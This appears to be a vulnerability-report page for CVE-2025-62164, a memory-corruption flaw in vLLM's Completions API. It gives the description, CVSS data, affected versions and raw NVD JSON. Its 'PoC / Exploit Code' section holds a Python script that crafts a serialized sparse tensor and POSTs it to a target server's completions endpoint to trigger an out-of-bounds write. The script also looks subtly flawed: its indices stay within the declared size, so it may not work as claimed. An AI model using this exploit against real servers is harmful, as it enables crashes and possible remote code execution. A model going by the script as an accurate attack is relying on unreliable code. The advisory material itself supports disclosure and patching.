Security Vulnerability Report
中文
CVE-2025-62164 CVSS 8.8 HIGH

CVE-2025-62164

Published: 2025-11-21 02:15:43
Last Modified: 2025-12-04 17:14:21

Description

vLLM is an inference and serving engine for large language models (LLMs). From versions 0.10.2 to before 0.11.1, a memory corruption vulnerability could lead to a crash (denial-of-service) and potentially remote code execution (RCE), exists in the Completions API endpoint. When processing user-supplied prompt embeddings, the endpoint loads serialized tensors using torch.load() without sufficient validation. Due to a change introduced in PyTorch 2.8.0, sparse tensor integrity checks are disabled by default. As a result, maliciously crafted tensors can bypass internal bounds checks and trigger an out-of-bounds memory write during the call to to_dense(). This memory corruption can crash vLLM and potentially lead to code execution on the server hosting vLLM. This issue has been patched in version 0.11.1.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:* - VULNERABLE
vLLM 0.10.2 到 0.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62164 PoC - Malicious Sparse Tensor Trigger import torch import requests import io def create_malicious_sparse_tensor(): """ Create a malicious sparse tensor designed to trigger OOB write during to_dense() conversion """ # Create a sparse tensor with manipulated indices indices = torch.tensor([[0, 0, 0], [0, 1, 2]], dtype=torch.long) values = torch.tensor([1.0, 2.0, 3.0], dtype=torch.float32) # Craft sparse tensor with invalid size that bypasses checks size = (1, 1000000000) # Intentionally large dimension sparse_tensor = torch.sparse_coo_tensor(indices, values, size) # Serialize to bytes (this is what gets sent to the server) buffer = io.BytesIO() torch.save(sparse_tensor, buffer) return buffer.getvalue() def exploit_vllm(target_url): """ Exploit vLLM CVE-2025-62164 """ malicious_data = create_malicious_sparse_tensor() # Prepare the request to Completions API payload = { 'model': 'meta-llama/Llama-2-7b-hf', 'prompt': 'test', 'max_tokens': 100, 'prompt_embeddings': malicious_data.hex() # Send serialized tensor } try: response = requests.post( f'{target_url}/v1/completions', json=payload, timeout=30 ) print(f'Status: {response.status_code}') print(f'Response: {response.text}') except Exception as e: print(f'Error: {e}') if __name__ == '__main__': target = 'http://target-vllm-server:8000' exploit_vllm(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62164", "sourceIdentifier": "[email protected]", "published": "2025-11-21T02:15:43.193", "lastModified": "2025-12-04T17:14:20.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From versions 0.10.2 to before 0.11.1, a memory corruption vulnerability could lead to a crash (denial-of-service) and potentially remote code execution (RCE), exists in the Completions API endpoint. When processing user-supplied prompt embeddings, the endpoint loads serialized tensors using torch.load() without sufficient validation. Due to a change introduced in PyTorch 2.8.0, sparse tensor integrity checks are disabled by default. As a result, maliciously crafted tensors can bypass internal bounds checks and trigger an out-of-bounds memory write during the call to to_dense(). This memory corruption can crash vLLM and potentially lead to code execution on the server hosting vLLM. This issue has been patched in version 0.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-123"}, {"lang": "en", "value": "CWE-502"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.10.2", "versionEndExcluding": "0.11.1", "matchCriteriaId": "257F44B9-5BDF-4A61-B7B9-A901DD438F9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*", "matchCriteriaId": "FEE054E1-1F84-4ACC-894C-D7E3652EF1B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "B05850DF-38FE-439F-9F7A-AA96DA9038CC"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/27204", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}